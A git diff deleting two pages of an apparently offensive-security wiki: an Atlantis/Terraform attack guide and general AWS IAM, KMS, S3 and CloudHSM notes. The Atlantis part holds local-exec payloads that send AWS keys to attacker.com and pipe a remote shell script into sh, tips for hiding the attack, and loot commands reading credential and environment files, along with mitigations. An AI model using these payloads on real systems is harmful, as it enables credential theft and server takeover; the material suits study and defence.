-* In the external resource, use the **ref** feature to hide the **terraform rev shell code in a branch** inside of the repo, something like: `git@github.com:carlospolop/terraform_external_module_rev_shell//modules?ref=b401d2b`
-* **Instead** of creating a **PR to master** to trigger Atlantis, **create 2 branches** (test1 and test2) and create a **PR from one to the other**. When you have completed the attack, just **remove the PR and the branches**.
-
-### Atlantis apply RCE - Config modification in new PR
-
-If you have write access over a repository you will be able to create a new branch on it and generate a PR. If you can **execute `atlantis apply` you will be able to RCE inside the Atlantis server**.
-
-However, you will usually need to bypass some protections:
-
-* **Mergeable**: If this protection is set in Atlantis, you can only run **`atlantis apply` if the PR is mergeable** (which means that the branch protection need to be bypassed).
- * Check potential [**branch protections bypasses**](github-security/#branch-protection-bypass)
-* **Approved**: If this protection is set in Atlantis, some **other user must approve the PR** before you can run `atlantis apply`
- * By default you can abuse the [**Gitbot token to bypass this protection**](github-security/#github\_token)
-
-Running **`terraform apply` on a malicious Terraform file with** [**local-exec**](https://www.terraform.io/docs/provisioners/local-exec.html)**.**\
-You just need to make sure some payload like the following ones ends up in the `main.tf` file:
-
-```json
-// Payload 1 to just steal a secret
-resource "null_resource" "secret_stealer" {
- provisioner "local-exec" {
- command = "curl https://attacker.com?access_key=$AWS_ACCESS_KEY&secret=$AWS_SECRET_KEY"
- }
-}
-
-// Payload 2 to get a rev shell
-resource "null_resource" "rev_shell" {
- provisioner "local-exec" {
- command = "sh -c 'curl https://reverse-shell.sh/8.tcp.ngrok.io:12946 | sh'"
- }
-}
-```
-
-Follow the **suggestions from the previous technique** to perform this attack in a **stealthier way**.
-
-### Terraform Param Injection
-
-When running `atlantis plan` or `atlantis apply`, terraform is run underneath; you can pass flags to terraform from atlantis by commenting something like:
-
-```bash
-atlantis plan --
-atlantis plan -- -h #Get terraform plan help
-
-atlantis apply --
-atlantis apply -- -h #Get terraform apply help
-```
-
-You can also pass values that might help bypass some protections. Check the terraform env vars in [https://www.terraform.io/cli/config/environment-variables](https://www.terraform.io/cli/config/environment-variables)
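-
-For example (the flags are standard terraform options; the resource name is hypothetical):
-
-```bash
-atlantis plan -- -lock=false                 # skip state locking
-atlantis plan -- -target=aws_instance.victim # narrow the plan to a single resource
-atlantis plan -- -var 'owner=attacker'       # override input variables
-```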
-
-### Custom Workflow
-
-Running **malicious custom build commands** specified in an `atlantis.yaml` file. Atlantis uses the `atlantis.yaml` file from the pull request branch, **not** the one from `master`.\
-This possibility was mentioned in a previous section:
-
-{% hint style="danger" %}
-If the flag `allow_custom_workflows` is set to **True**, workflows can be **specified** in the **`atlantis.yaml`** file of each repo.\
-This will basically give **RCE in the Atlantis server to any user that can access that repo**.
-
-```yaml
-# atlantis.yaml
-version: 3
-projects:
-- dir: .
- workflow: custom1
-workflows:
- custom1:
- plan:
- steps:
- - init
- - run: my custom plan command
- apply:
- steps:
- - run: my custom apply command
-```
-{% endhint %}
-
-### PR Hijacking
-
-If someone sends **`atlantis plan/apply` comments on your valid pull requests,** it will cause terraform to run when you don't want it to.
-
-Moreover, if the **branch protection** isn't configured to **re-evaluate** every PR when a **new commit is pushed** to it, someone could **write malicious configs** (check previous scenarios) into the terraform config, run `atlantis plan/apply` and gain RCE.
-
-This is the **setting** in Github branch protections:
-
-![](<../.gitbook/assets/image (307) (4).png>)
-
-### Webhook Secret
-
-If you manage to **steal the webhook secret** used, or if there **isn't any webhook secret** being used, you could **call the Atlantis webhook** and **invoke atlantis commands** directly.
-
-### Bitbucket
-
-Bitbucket Cloud does **not support webhook secrets**. This could allow attackers to **spoof requests from Bitbucket**. Ensure you are allowing only Bitbucket IPs.
-
-* This means that an **attacker** could make **fake requests to Atlantis** that look like they're coming from Bitbucket.
-* If you are specifying `--repo-allowlist` then they could only fake requests pertaining to those repos so the most damage they could do would be to plan/apply on your own repos.
-* To prevent this, allowlist [Bitbucket's IP addresses](https://confluence.atlassian.com/bitbucket/what-are-the-bitbucket-cloud-ip-addresses-i-should-use-to-configure-my-corporate-firewall-343343385.html) (see Outbound IPv4 addresses).
-
-## Post-Exploitation
-
-If you managed to get access to the server, or at least got an LFI, there are some interesting files you should try to read:
-
-* `/home/atlantis/.git-credentials` Contains vcs access credentials
-* `/atlantis-data/atlantis.db` Contains vcs access credentials with more info
-* `/atlantis-data/repos/<org>/<repo>/<pr_num>/<workspace>/<dir>/.terraform/terraform.tfstate` Terraform state file
- * Example: /atlantis-data/repos/ghOrg/myRepo/20/default/env/prod/.terraform/terraform.tfstate
-* `/proc/1/environ` Env variables
-* `/proc/[2-20]/cmdline` Cmd line of `atlantis server` (may contain sensitive data)
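-
-A quick loot sketch once you have a shell (paths taken from the list above):
-
-```bash
-cat /home/atlantis/.git-credentials
-strings /atlantis-data/atlantis.db | grep -iE 'token|secret|password'
-find /atlantis-data/repos -name terraform.tfstate 2>/dev/null
-tr '\0' '\n' < /proc/1/environ | grep -iE 'token|key|secret'
-```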
-
-## Mitigations
-
-### Don't Use On Public Repos
-
-Because anyone can comment on public pull requests, even with all the security mitigations available, it's still dangerous to run Atlantis on public repos without proper configuration of the security settings.
-
-### Don't Use `--allow-fork-prs`
-
-If you're running on a public repo (which isn't recommended, see above) you shouldn't set `--allow-fork-prs` (defaults to false) because anyone can open up a pull request from their fork to your repo.
-
-### `--repo-allowlist`
-
-Atlantis requires you to specify an allowlist of repositories it will accept webhooks from via the `--repo-allowlist` flag. For example:
-
-* Specific repositories: `--repo-allowlist=github.com/runatlantis/atlantis,github.com/runatlantis/atlantis-tests`
-* Your whole organization: `--repo-allowlist=github.com/runatlantis/*`
-* Every repository in your GitHub Enterprise install: `--repo-allowlist=github.yourcompany.com/*`
-* All repositories: `--repo-allowlist=*`. Useful for when you're in a protected network but dangerous without also setting a webhook secret.
-
-This flag ensures your Atlantis install isn't being used with repositories you don't control. See `atlantis server --help` for more details.
-
-### Protect Terraform Planning
-
-If attackers submitting pull requests with malicious Terraform code is in your threat model then you must be aware that `terraform apply` approvals are not enough. It is possible to run malicious code in a `terraform plan` using the [`external` data source](https://registry.terraform.io/providers/hashicorp/external/latest/docs/data-sources/data\_source) or by specifying a malicious provider. This code could then exfiltrate your credentials.
-
-To prevent this, you could:
-
-1. Bake providers into the Atlantis image or host and deny egress in production.
-2. Implement the provider registry protocol internally and deny public egress; that way you control who has write access to the registry.
-3. Modify your [server-side repo configuration](https://www.runatlantis.io/docs/server-side-repo-config.html)'s `plan` step to validate against the use of disallowed providers or data sources or PRs from not allowed users. You could also add in extra validation at this point, e.g. requiring a "thumbs-up" on the PR before allowing the `plan` to continue. Conftest could be of use here.
-
-### Webhook Secrets
-
-Atlantis should be run with Webhook secrets set via the `$ATLANTIS_GH_WEBHOOK_SECRET`/`$ATLANTIS_GITLAB_WEBHOOK_SECRET` environment variables. Even with the `--repo-allowlist` flag set, without a webhook secret, attackers could make requests to Atlantis posing as a repository that is allowlisted. Webhook secrets ensure that the webhook requests are actually coming from your VCS provider (GitHub or GitLab).
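-
-A minimal sketch of starting the server with a secret (user, token and allowlist are placeholders):
-
-```bash
-export ATLANTIS_GH_WEBHOOK_SECRET="$(openssl rand -hex 32)"  # use the same value in the Git host webhook config
-atlantis server --gh-user atlantis-bot --gh-token "$TOKEN" --repo-allowlist 'github.com/yourorg/*'
-```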
-
-If you are using Azure DevOps, instead of webhook secrets add a basic username and password.
-
-**Azure DevOps Basic Authentication**
-
-Azure DevOps supports sending a basic authentication header in all webhook events. This requires using an HTTPS URL for your webhook location.
-
-### SSL/HTTPS
-
-If you're using webhook secrets but your traffic is over HTTP then the webhook secrets could be stolen. Enable SSL/HTTPS using the `--ssl-cert-file` and `--ssl-key-file` flags.
-
-### Enable Authentication on Atlantis Web Server
-
-It is highly recommended to enable authentication on the web service. Enable BasicAuth using `--web-basic-auth=true` and set up a username and password using the `--web-username=yourUsername` and `--web-password=yourPassword` flags.
-
-You can also pass these as environment variables `ATLANTIS_WEB_BASIC_AUTH=true` `ATLANTIS_WEB_USERNAME=yourUsername` and `ATLANTIS_WEB_PASSWORD=yourPassword`.
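-
-For example:
-
-```bash
-export ATLANTIS_WEB_BASIC_AUTH=true
-export ATLANTIS_WEB_USERNAME=yourUsername
-export ATLANTIS_WEB_PASSWORD=yourPassword  # use a strong password, not this placeholder
-```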
-
-## References
-
-* [**https://www.runatlantis.io/docs**](https://www.runatlantis.io/docs)
-
-
-
-
-
diff --git a/cloud-security/aws-security.md b/cloud-security/aws-security.md
deleted file mode 100644
index 71a11f3b1..000000000
--- a/cloud-security/aws-security.md
+++ /dev/null
@@ -1,1019 +0,0 @@
-
-
-
-
-
-
-
-
-# Types of services
-
-## Container services
-
-Services that fall under container services have the following characteristics:
-
-* The service itself runs on **separate infrastructure instances**, such as EC2.
-* **AWS** is responsible for **managing the operating system and the platform**.
-* A managed service is provided by AWS, typically the service itself for the **actual applications, which are seen as containers**.
-* As a user of these container services, you have a number of management and security responsibilities, including **managing network access security, such as network access control list rules and any firewalls**.
-* Also, platform-level identity and access management where it exists.
-* **Examples** of AWS container services include Relational Database Service, Elastic MapReduce, and Elastic Beanstalk.
-
-## Abstract Services
-
-* These services are **removed, abstracted, from the platform or management layer which cloud applications are built on**.
-* The services are accessed via endpoints using AWS application programming interfaces, APIs.
-* The **underlying infrastructure, operating system, and platform is managed by AWS**.
-* The abstracted services provide a multi-tenancy platform on which the underlying infrastructure is shared.
-* **Data is isolated via security mechanisms**.
-* Abstract services have a strong integration with IAM, and **examples** of abstract services include S3, DynamoDB, Amazon Glacier, and SQS.
-
-# IAM - Identity and Access Management
-
-IAM is the service that will allow you to manage **Authentication**, **Authorization** and **Access Control** inside your AWS account.
-
-* **Authentication** - Process of defining an identity and the verification of that identity. This process can be subdivided into identification and verification.
-* **Authorization** - Determines what an identity can access within a system once it's been authenticated to it.
-* **Access Control** - The method and process of how access is granted to a secure resource
-
-IAM can be defined by its ability to manage, control and govern authentication, authorization and access control mechanisms of identities to your resources within your AWS account.
-
-## Users
-
-This could be a **real person** within your organization who requires access to operate and maintain your AWS environment. Or it could be an account to be used by an **application** that may require permissions to **access** your **AWS** resources **programmatically**. Note that **usernames must be unique**.
-
-### CLI
-
-* **Access Key ID**: 20 random uppercase alphanumeric characters like AKHDNAPO86BSHKDIRYT
-* **Secret access key ID**: 40 random upper and lowercase characters: S836fh/J73yHSb64Ag3Rkdi/jaD6sPl6/antFtU (It's not possible to retrieve lost secret access key IDs).
-
-Whenever you need to **change the Access Key** this is the process you should follow:\
-_Create a new access key -> Apply the new key to system/application -> mark original one as inactive -> Test and verify new access key is working -> Delete old access key_
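-
-A sketch of that rotation with the AWS CLI (user name and key ID are placeholders):
-
-```bash
-aws iam create-access-key --user-name some-user   # 1. create the new key
-# 2. update the application/system with the new key, then:
-aws iam update-access-key --user-name some-user --access-key-id AKIAOLDKEYEXAMPLE --status Inactive
-# 3. test and verify the new key works, then:
-aws iam delete-access-key --user-name some-user --access-key-id AKIAOLDKEYEXAMPLE
-```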
-
-**MFA** is **supported** when using the AWS **CLI**.
-
-## Groups
-
-These are objects that **contain multiple users**. Permissions can be assigned to a user or inherited from a group. **Giving permissions to groups, and not to individual users, is the secure way to grant permissions**.
-
-## Roles
-
-Roles are used to grant identities a set of permissions. **Roles don't have any access keys or credentials associated with them**. Roles are usually used with resources (like EC2 machines) but they can also be useful to grant **temporary privileges to a user**. Note that when for example an EC2 has an IAM role assigned, instead of saving some keys inside the machine, dynamic temporary access keys will be supplied by the IAM role to handle authentication and determine if access is authorized.
-
-An IAM role consists of **two types of policies**: a **trust policy**, which cannot be empty, defining who can assume the role, and a **permissions policy**, defining what they can access.
-
-### AWS Security Token Service (STS)
-
-This is a web service that enables you to **request temporary, limited-privilege credentials** for AWS Identity and Access Management (IAM) users or for users that you authenticate (federated users).
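-
-For example, requesting temporary credentials for a role (the ARN and session name are placeholders):
-
-```bash
-aws sts assume-role \
-  --role-arn arn:aws:iam::123456789012:role/SomeRole \
-  --role-session-name test-session \
-  --duration-seconds 3600
-# Returns a temporary AccessKeyId, SecretAccessKey and SessionToken
-```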
-
-## Policies
-
-### Policy Permissions
-
-Are used to assign permissions. There are 2 types:
-
-* AWS managed policies (preconfigured by AWS)
-* Customer Managed Policies: Configured by you. You can create policies based on AWS managed policies (modifying one of them and creating your own), using the policy generator (a GUI that helps you grant and deny permissions) or writing your own.
-
-By **default access** is **denied**; access will be granted only if an explicit Allow has been specified.\
-If a **single "Deny" exists, it will override the "Allow"**, except for requests that use the AWS account's root security credentials (which are allowed by default).
-
-```javascript
-{
- "Version": "2012-10-17", //Version of the policy
- "Statement": [ //Main element, there can be more than 1 entry in this array
- {
- "Sid": "Stmt32894y234276923" //Unique identifier (optional)
- "Effect": "Allow", //Allow or deny
- "Action": [ //Actions that will be allowed or denied
- "ec2:AttachVolume",
- "ec2:DetachVolume"
- ],
- "Resource": [ //Resource the action and effect will be applied to
- "arn:aws:ec2:*:*:volume/*",
- "arn:aws:ec2:*:*:instance/*"
- ],
- "Condition": { //Optional element that allow to control when the permission will be effective
- "ArnEquals": {"ec2:SourceInstanceARN": "arn:aws:ec2:*:*:instance/instance-id"}
- }
- }
- ]
-}
-```
-
-### Inline Policies
-
-This kind of policy is **directly assigned** to a user, group or role. It doesn't appear in the Policies list, so no one else can use it.\
-Inline policies are useful if you want to **maintain a strict one-to-one relationship between a policy and the identity** that it's applied to. For example, you want to be sure that the permissions in a policy are not inadvertently assigned to an identity other than the one they're intended for. When you use an inline policy, the permissions in the policy cannot be inadvertently attached to the wrong identity. In addition, when you use the AWS Management Console to delete that identity, the policies embedded in the identity are deleted as well. That's because they are part of the principal entity.
-
-### S3 Bucket Policies
-
-Can only be applied to S3 buckets. They contain an attribute called 'principal' that can be: IAM users, federated users, another AWS account or an AWS service. **Principals define who/what should be allowed or denied access to various S3 resources.**
-
-## Multi-Factor Authentication
-
-It's used to **create an additional factor for authentication** on top of your existing methods, such as a password, therefore creating a multi-factor level of authentication.\
-You can use a **free virtual application or a physical device**. You can use apps like Google Authenticator for free to activate MFA in AWS.
-
-## Identity Federation
-
-Identity federation **allows users from identity providers which are external** to AWS to access AWS resources securely without having to supply AWS user credentials from a valid IAM user account. \
-An example of an identity provider can be your own corporate Microsoft Active Directory (via SAML) or OpenID services (like Google). Federated access will then allow the users within it to access AWS.\
-AWS Identity Federation connects via IAM roles.
-
-### Cross Account Trusts and Roles
-
-**A user** (trusting) can create a Cross Account Role with some policies and then **allow another user** (trusted) to **access his account**, but only **having the access indicated in the new role policies**. To create this, just create a new Role and select Cross Account Role. Roles for Cross-Account Access offer two options: providing access between AWS accounts that you own, and providing access between an account that you own and a third party AWS account.\
-It's recommended to **specify the user who is trusted and not put some generic thing**, because if not, other authenticated users like federated users will also be able to abuse this trust.
-
-### AWS Simple AD
-
-Not supported:
-
-* Trust Relations
-* AD Admin Center
-* Full PS API support
-* AD Recycle Bin
-* Group Managed Service Accounts
-* Schema Extensions
-* Direct access to the OS or instances
-
-### Web Federation or OpenID Authentication
-
-The app uses the AssumeRoleWithWebIdentity API to create temporary credentials. However, this doesn't grant access to the AWS console, just access to resources within AWS.
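-
-A sketch of the call (the ARN and the OIDC token are placeholders):
-
-```bash
-aws sts assume-role-with-web-identity \
-  --role-arn arn:aws:iam::123456789012:role/WebAppRole \
-  --role-session-name web-session \
-  --web-identity-token "$OIDC_TOKEN"
-```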
-
-## Other IAM options
-
-* You can **set a password policy setting** options like minimum length and password requirements.
-* You can **download "Credential Report"** with information about current credentials (like user creation time, is password enabled...). You can generate a credential report as often as once every **four hours**.
-
-# KMS - Key Management Service
-
-AWS Key Management Service (AWS KMS) is a managed service that makes it easy for you to **create and control **_**customer master keys**_** (CMKs)**, the encryption keys used to encrypt your data. AWS KMS CMKs are **protected by hardware security modules** (HSMs)
-
-KMS uses **symmetric cryptography**. This is used to **encrypt information at rest** (for example, inside S3). If you need to **encrypt information in transit** you need to use something like **TLS**.\
-KMS is a **region specific service**.
-
-**Administrators at Amazon do not have access to your keys**. They cannot recover your keys and they do not help you with encryption of your keys. AWS simply administers the operating system and the underlying application; it's up to us to administer our encryption keys and how those keys are used.
-
-**Customer Master Keys** (CMK): Can encrypt data up to 4KB in size. They are typically used to create, encrypt, and decrypt the DEKs (Data Encryption Keys). Then the DEKs are used to encrypt the data.
-
-A customer master key (CMK) is a logical representation of a master key in AWS KMS. In addition to the master key's identifiers and other metadata, including its creation date, description, and key state, a **CMK contains the key material which is used to encrypt and decrypt data**. When you create a CMK, by default, AWS KMS generates the key material for that CMK. However, you can choose to create a CMK without key material and then import your own key material into that CMK.
-
-There are 2 types of master keys:
-
-* **AWS managed CMKs: Used by other services to encrypt data**. It's used by the service that created it in a region. They are created the first time you implement the encryption in that service. Rotates every 3 years and it's not possible to change it.
-* **Customer managed CMKs**: Flexibility, rotation, configurable access and key policy. Enable and disable keys.
-
-**Envelope Encryption** in the context of Key Management Service (KMS): Two-tier hierarchy system to **encrypt data with data key and then encrypt data key with master key**.
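-
-A sketch of that flow with the CLI (the alias is hypothetical; note the CLI returns the plaintext key base64-encoded, so convert it before handing it to openssl):
-
-```bash
-# Ask KMS for a data key: returns the plaintext DEK and the same DEK encrypted under the CMK
-aws kms generate-data-key --key-id alias/my-cmk --key-spec AES_256
-# Encrypt locally with the plaintext DEK, store only the ciphertext + the *encrypted* DEK,
-# and wipe the plaintext DEK
-openssl enc -aes-256-cbc -K "$PLAINTEXT_KEY_HEX" -iv "$IV_HEX" -in data.txt -out data.enc
-```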
-
-## Key Policies
-
-These define **who can use and access a key in KMS**. By default the root user has full access over KMS; if you remove that access from a key policy, you need to contact AWS support to recover it.
-
-Properties of a policy:
-
-* JSON based document
-* Resource --> Affected resources (can be "\*")
-* Action --> kms:Encrypt, kms:Decrypt, kms:CreateGrant ... (permissions)
-* Effect --> Allow/Deny
-* Principal --> arn affected
-* Conditions (optional) --> Condition to give the permissions
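-
-A minimal key policy sketch applied with the CLI (account ID, user and key ID are placeholders; be careful: replacing the default policy without keeping admin access can lock you out of the key):
-
-```bash
-cat > key-policy.json <<'EOF'
-{
-  "Version": "2012-10-17",
-  "Statement": [{
-    "Sid": "Allow use of the key",
-    "Effect": "Allow",
-    "Principal": {"AWS": "arn:aws:iam::123456789012:user/some-user"},
-    "Action": ["kms:Encrypt", "kms:Decrypt"],
-    "Resource": "*"
-  }]
-}
-EOF
-aws kms put-key-policy --key-id <key-id> --policy-name default --policy file://key-policy.json
-```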
-
-Grants:
-
-* Allow you to delegate your permissions to another AWS principal within your AWS account. You need to create them using the AWS KMS APIs. You can indicate the CMK identifier, the grantee principal and the required level of operations (Decrypt, Encrypt, GenerateDataKey...)
-* After the grant is created, a GrantToken and a GrantID are issued
-
-Access:
-
-* Via key policy -- If this exists, it takes precedence over the IAM policy, so the IAM policy is not used
-* Via IAM policy
-* Via grants
-
-## Key Administrators
-
-Key administrator by default:
-
-* Have access to manage KMS but not to encrypt or decrypt data
-* Only IAM users and roles can be added to Key Administrators list (not groups)
-* If external CMK is used, Key Administrators have the permission to import key material
-
-## Rotation of CMKs
-
-* The longer the same key is left in place, the more data is encrypted with that key, and if that key is breached, then the wider the blast area of data is at risk. In addition to this, the longer the key is active, the probability of it being breached increases.
-* **KMS rotates customer keys every 365 days** (or you can perform the process manually whenever you want) and **keys managed by AWS every 3 years**, and this period cannot be changed.
-* **Older keys are retained** to decrypt data that was encrypted prior to the rotation
-* In case of a breach, rotating the key won't remove the threat, as it will still be possible to decrypt all the data encrypted with the compromised key. However, the **new data will be encrypted with the new key**.
-* If **CMK** is in state of **disabled** or **pending** **deletion**, KMS will **not perform a key rotation** until the CMK is re-enabled or deletion is cancelled.
-
-### Manual rotation
-
-* A **new CMK needs to be created**; this generates a new CMK-ID, so you will need to **update** any **application** to **reference** the new CMK-ID.
-* To do this process easier you can **use aliases to refer to a key-id** and then just update the key the alias is referring to.
-* You need to **keep old keys to decrypt old files** encrypted with them.
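-
-A sketch of alias-based manual rotation (the alias name is hypothetical):
-
-```bash
-NEW_KEY=$(aws kms create-key --query KeyMetadata.KeyId --output text)
-aws kms update-alias --alias-name alias/my-app-key --target-key-id "$NEW_KEY"
-# Keep (don't delete) the old CMK: it's still needed to decrypt data encrypted before the rotation
-```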
-
-You can import keys from your on-premises key infrastructure.
-
-## Other information
-
-KMS is priced per number of encryption/decryption requests received from all services per month.
-
-KMS has full audit and compliance **integration with CloudTrail**; this is where you can audit all changes performed on KMS.
-
-With KMS policy you can do the following:
-
-* Limit who can create data keys and which services have access to use these keys
-* Limit systems access to encrypt only, decrypt only or both
-* Define to enable systems to access keys across regions (although it is not recommended as a failure in the region hosting KMS will affect availability of systems in other regions).
-
-You cannot synchronize or move/copy keys across regions; you can only define rules to allow access across region.
-
-# S3
-
-Amazon S3 is a service that allows you to **store large amounts of data**.
-
-Amazon S3 provides multiple options to achieve the **protection** of data at REST. The options include **Permission** (Policy), **Encryption** (Client and Server Side), **Bucket Versioning** and **MFA** **based delete**. The **user can enable** any of these options to achieve data protection. **Data replication** is an internal facility by AWS where **S3 automatically replicates each object across all the Availability Zones** and the organization need not enable it in this case.
-
-With resource-based permissions, you can define permissions for sub-directories of your bucket separately.
-
-## S3 Access logs
-
-It's possible to **enable S3 access logging** (which by default is disabled) on a bucket and save the logs in a different bucket to know who is accessing the bucket. The source bucket and the target bucket (the one saving the logs) need to be in the same region.
-
-## S3 Encryption Mechanisms
-
-**DEK means Data Encryption Key** and is the key that is always generated and used to encrypt data.
-
-**Server-side encryption with S3 managed keys, SSE-S3:** This option requires minimal configuration and all management of encryption keys used are managed by AWS. All you need to do is to **upload your data and S3 will handle all other aspects**. Each bucket in a S3 account is assigned a bucket key.
-
-* Encryption:
- * Object Data + created plaintext DEK --> Encrypted data (stored inside S3)
- * Created plaintext DEK + S3 Master Key --> Encrypted DEK (stored inside S3) and plain text is deleted from memory
-* Decryption:
- * Encrypted DEK + S3 Master Key --> Plaintext DEK
- * Plaintext DEK + Encrypted data --> Object Data
-
-Please note that in this case **the key is managed by AWS** (rotation only every 3 years). If you use your own key you will be able to rotate, disable and apply access control.
-
-**Server-side encryption with KMS managed keys, SSE-KMS:** This method allows S3 to use the key management service to generate your data encryption keys. KMS gives you far greater flexibility in how your keys are managed. For example, you are able to disable, rotate, and apply access controls to the CMK, and audit their usage using AWS CloudTrail.
-
-* Encryption:
- * S3 requests a data key from the KMS CMK
- * KMS uses the CMK to generate the pair DEK plaintext / DEK encrypted and sends them to S3
- * S3 uses the plaintext key to encrypt the data, stores the encrypted data and the encrypted key, and deletes the plaintext key from memory
-* Decryption:
- * S3 asks KMS to decrypt the encrypted data key of the object
- * KMS decrypts the data key with the CMK and sends it back to S3
- * S3 decrypts the object data
-
-**Server-side encryption with customer provided keys, SSE-C:** This option gives you the opportunity to provide your own master key that you may already be using outside of AWS. Your customer-provided key would then be sent with your data to S3, where S3 would then perform the encryption for you.
-
-* Encryption:
- * The user sends the object data + Customer key to S3
- * The customer key is used to encrypt the data and the encrypted data is stored
- * A salted HMAC value of the customer key is also stored for future key validation
- * The customer key is deleted from memory
-* Decryption:
- * The user sends the customer key
- * The key is validated against the stored HMAC value
- * The customer provided key is then used to decrypt the data
-
-**Client-side encryption with KMS, CSE-KMS:** Similarly to SSE-KMS, this also uses the key management service to generate your data encryption keys. However, this time KMS is called upon via the client not S3. The encryption then takes place client-side and the encrypted data is then sent to S3 to be stored.
-
-* Encryption:
- * The client requests a data key from KMS
- * KMS returns the plaintext DEK and the DEK encrypted with the CMK
- * Both keys are sent back
- * The client then encrypts the data with the plaintext DEK and sends to S3 the encrypted data + the encrypted DEK (which is saved as metadata of the encrypted object inside S3)
-* Decryption:
- * The encrypted data with the encrypted DEK is sent to the client
- * The client asks KMS to decrypt the encrypted key using the CMK and KMS sends back the plaintext DEK
- * The client can now decrypt the encrypted data
-
-**Client-side encryption with customer provided keys, CSE-C:** Using this mechanism, you are able to utilize your own provided keys and use an AWS-SDK client to encrypt your data before sending it to S3 for storage.
-
-* Encryption:
- * The client generates a DEK and encrypts the plaintext data
- * Then, using its own custom CMK, it encrypts the DEK
- * It submits the encrypted data + encrypted DEK to S3, where it's stored
-* Decryption:
- * S3 sends the encrypted data and DEK
- * As the client already has the CMK used to encrypt the DEK, it decrypts the DEK and then uses the plaintext DEK to decrypt the data
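-
-For example, the server-side modes can be requested explicitly with the high-level CLI (bucket, file and key alias are placeholders):
-
-```bash
-aws s3 cp data.txt s3://mybucket/data.txt --sse AES256                                 # SSE-S3
-aws s3 cp data.txt s3://mybucket/data.txt --sse aws:kms --sse-kms-key-id alias/my-cmk  # SSE-KMS
-aws s3 cp data.txt s3://mybucket/data.txt --sse-c AES256 --sse-c-key fileb://key.bin   # SSE-C
-```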
-
-# HSM - Hardware Security Module
-
-Cloud HSM is a FIPS 140-2 Level 2 validated **hardware device** for secure cryptographic key storage (note that CloudHSM is a hardware appliance, it is not a virtualized service). It is a SafeNet Luna 7000 appliance with 5.3.13 preloaded. There are two firmware versions and which one you pick is really based on your exact needs. One is for FIPS 140-2 compliance and there was a newer version that can be used.
-
-The unusual feature of CloudHSM is that it is a physical device, and thus it is **not shared with other customers**, or as it is commonly termed, multi-tenant. It is a dedicated single-tenant appliance exclusively made available to your workloads.
-
-Typically, a device is available within 15 minutes assuming there is capacity, but if the AZ is out of capacity it can take two weeks or more to acquire additional capacity.
-
-Both KMS and CloudHSM are available to you at AWS and both are integrated with your apps at AWS. Since this is a physical device dedicated to you, **the keys are stored on the device**. Keys need to either be **replicated to another device**, backed up to offline storage, or exported to a standby appliance. **This device is not backed** by S3 or any other service at AWS like KMS.
-
-In **CloudHSM**, you have to **scale the service yourself**. You have to provision enough CloudHSM devices to handle whatever your encryption needs are based on the encryption algorithms you have chosen to implement for your solution.\
-Key Management Service scaling is performed by AWS, which automatically scales on demand. As your use grows, so might the number of CloudHSM appliances that are required; keep this in mind as you scale your solution and, if your solution has auto-scaling, make sure your maximum scale is accounted for with enough CloudHSM appliances to service the solution.
-
-Just like scaling, **performance is up to you with CloudHSM**. Performance varies based on which encryption algorithm is used and on how often you need to access or retrieve the keys to encrypt the data. Key management service performance is handled by Amazon and automatically scales as demand requires it. CloudHSM's performance is achieved by adding more appliances and if you need more performance you either add devices or alter the encryption method to the algorithm that is faster.
-
-If your solution is **multi-region**, you should add several **CloudHSM appliances in the second region and work out the cross-region connectivity with a private VPN connection** or some method to ensure the traffic is always protected between the appliance at every layer of the connection. If you have a multi-region solution you need to think about how to **replicate keys and set up additional CloudHSM devices in the regions where you operate**. You can very quickly get into a scenario where you have six or eight devices spread across multiple regions, enabling full redundancy of your encryption keys.
-
-**CloudHSM** is an enterprise class service for secured key storage and can be used as a **root of trust for an enterprise**. It can store private keys in PKI and certificate authority keys in X509 implementations. In addition to symmetric keys used in symmetric algorithms such as AES, **KMS stores and physically protects symmetric keys only (cannot act as a certificate authority)**, so if you need to store PKI and CA keys a CloudHSM or two or three could be your solution.
-
-**CloudHSM is considerably more expensive than Key Management Service**. CloudHSM is a hardware appliance, so you have fixed costs to provision the CloudHSM device, then an hourly cost to run the appliance. The cost is multiplied by as many CloudHSM appliances as are required to achieve your specific requirements.\
-Additionally, cross consideration must be made in the purchase of third party software such as SafeNet ProtectV software suites and integration time and effort. Key Management Service is usage based and depends on the number of keys you have and the input and output operations. As key management provides seamless integration with many AWS services, integration costs should be significantly lower. Costs should be considered a secondary factor in encryption solutions. Encryption is typically used for security and compliance.
-
-**With CloudHSM only you have access to the keys** and without going into too much detail, with CloudHSM you manage your own keys. **With KMS, you and Amazon co-manage your keys**. AWS does have many policy safeguards against abuse and **still cannot access your keys in either solution**. The main distinction is compliance as it pertains to key ownership and management, and with CloudHSM, this is a hardware appliance that you manage and maintain with exclusive access to you and only you.
-
-## CloudHSM Suggestions
-
-1. Always deploy CloudHSM in an **HA setup** with at least two appliances in **separate availability zones**, and if possible, deploy a third either on premise or in another region at AWS.
-2. Be careful when **initializing** a **CloudHSM**. This action **will destroy the keys**, so either have another copy of the keys or be absolutely sure you do not and never, ever will need these keys to decrypt any data.
-3. CloudHSM only **supports certain versions of firmware** and software. Before performing any update, make sure the firmware and or software is supported by AWS. You can always contact AWS support to verify if the upgrade guide is unclear.
-4. The **network configuration should never be changed.** Remember, it's in an AWS data center and AWS is monitoring the base hardware for you. This means that if the hardware fails, they will replace it for you, but only if they know it failed.
-5. The **SysLog forward should not be removed or changed**. You can always **add** a SysLog forwarder to direct the logs to your own collection tool.
-6. The **SNMP** configuration has the same basic restrictions as the network and SysLog forwarder. This **should not be changed or removed**. An **additional** SNMP configuration is fine, just make sure you do not change the one that is already on the appliance.
-7. Another interesting best practice from AWS is **not to change the NTP configuration**. It is not clear what would happen if you did, so keep in mind that if you don't use the same NTP configuration for the rest of your solution then you could have two time sources. Just be aware of this and know that the CloudHSM has to stay with the existing NTP source.
-
-The initial launch charge for CloudHSM is $5,000 to allocate the hardware appliance dedicated for your use, then there is an hourly charge associated with running CloudHSM that is currently at $1.88 per hour of operation, or approximately $1,373 per month.
-
-The most common reason to use CloudHSM is compliance standards that you must meet for regulatory reasons. **KMS does not offer data support for asymmetric keys. CloudHSM does let you store asymmetric keys securely**.
-
-The **public key is installed on the HSM appliance during provisioning** so you can access the CloudHSM instance via SSH.
-
-# Amazon Athena
-
-Amazon Athena is an interactive query service that makes it easy to **analyze data** directly in Amazon Simple Storage Service (Amazon **S3**) **using** standard **SQL**.
-
-You need to **prepare a relational DB table** with the format of the content that is going to appear in the monitored S3 buckets. Then, Amazon Athena will be able to populate the DB from the logs, so you can query it.
-
-Amazon Athena supports the **ability to query S3 data that is already encrypted** and, if configured to do so, **Athena can also encrypt the results of the query, which can then be stored in S3**.
-
